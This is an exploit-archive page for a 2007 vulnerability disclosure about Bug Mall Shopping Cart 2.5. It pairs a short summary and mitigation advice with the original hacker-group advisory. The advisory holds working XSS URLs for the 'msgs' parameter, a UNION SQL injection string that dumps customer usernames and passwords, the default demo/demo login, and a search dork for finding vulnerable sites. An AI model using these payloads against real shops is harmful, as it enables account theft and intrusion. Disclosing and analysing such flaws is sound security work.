BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS

vendor:

Shopping Cart

by:

t0pP8uZz & xprog

5.5

CVSS

MEDIUM

SQL Injection, XSS, Default Logins

CWE

Product Name: Shopping Cart

Affected Version From: 2.5 and prior

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS

The Bug Mall Shopping Cart 2.5 and prior versions are vulnerable to SQL injection, cross-site scripting (XSS), and default login vulnerabilities. The SQL injection vulnerability can be exploited through the search box, allowing an attacker to execute arbitrary SQL queries. The XSS vulnerability can be exploited by injecting HTML or JavaScript code into the 'msgs' parameter. The script also seems to have a default login with the username 'demo' and password 'demo'.

Mitigation:

To mitigate the SQL injection vulnerability, input validation and parameterized queries should be implemented. The XSS vulnerability can be mitigated by properly encoding user input. The default login should be disabled or the password should be changed to a strong and unique one.

Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+           BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS       +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog (Excellent Work xprog thanks :D)


SCRIPT DOWNLOAD: http://www.bug-mall.org/downloads/bugmall.zip

ORIGINAL ADVISORY CAN BE FOUND HERE: http://www.h4cky0u.org/viewtopic.php?t=26834


SITE: http://www.bug-mall.org


DORK: Powered by Bug Software intext:Your Cart Contains


EXPLOITS:

EXPLOIT 1: http://www.site.com/BugMallPAth/index.php?msgs=[HTML, JAVASCRIPT]
EXPLOIT 2: The basic search box is vulnerable to sql injection, check examples for detail.
EXPLOIT 3: The script seems to have a default login, username:demo password: demo, we have tried this on several sites
and sucsefully logged in.


EXAMPLES:

EXAMPLE 1 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=<html><body>VULN BY<br>t0pP8uZz<br>h4cky0u.org</body><html>
EXAMPLE 2 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=<script>alert("XSS")</script>
EXAMPLE 3: Paste following into search box 
' and 1=2 UNION ALL SELECT 1,2,3,4,concat(username,':',password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102 from clientes/*


Note: Some servers may be running older version of MYSQL and make it harder to inject without UNION.

GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net

FROM GM!: Kw3[R]ln get over it :D.


--==+================================================================================+==--
--==+           BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS       +==--
--==+================================================================================+==--

# milw0rm.com [2007-06-25]